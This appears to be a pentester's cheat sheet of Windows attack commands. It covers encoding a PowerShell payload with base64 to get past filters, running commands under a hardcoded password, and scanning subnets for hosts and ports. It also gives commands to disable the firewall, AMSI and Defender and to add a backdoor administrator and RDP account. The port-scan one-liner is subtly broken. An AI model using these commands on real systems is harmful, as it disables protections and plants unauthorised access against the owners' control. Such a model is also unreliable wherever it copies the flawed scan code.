# Windows Tricks

# PowerShell base64-encoded command

Create a base64 payload to avoid bad characters (PowerShell expects the command as UTF-16LE before base64 encoding, hence the iconv step below).

# Create the command for PowerShell to execute
$ echo -n 'ping -n 2 10.10.14.2' | iconv -t utf-16le | base64 -w 0
cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==

# Run PowerShell with the encoded-command flag
Payload: cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==

# Run a command as a user (with credentials)

$pass = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("disco\\Alice", $pass)
Invoke-Command -ComputerName disco -Credential $cred -ScriptBlock {whoami}

# List running processes with their arguments

WMIC path win32_process get Caption,Processid,Commandline

# Scan for hosts and open ports in a subnet

# Scan for Hosts in Subnet
PS > 1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.2.$_" -Count 1 -ErrorAction SilentlyContinue}

# Scan for open Ports
PS > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.2.101",$)) "Port $ is open!"} 2>$null

# PowerShell

# PowerShell Directory
c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

# FIX THE PATH VARIABLE
set PATH=%SystemRoot%\system32;%SystemRoot%;

# Search for files

Get-Childitem –Path C:\ -Include *filetosearch* -Recurse -ErrorAction SilentlyContinue

# Windows Security

# Disable Firewall

NetSh Advfirewall set allprofiles state off

# Disable AMSI

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

# Disable Defender

sc stop WinDefend

# Execution Policy

Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted -Scope CurrentUser

# Add an RDP user

net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD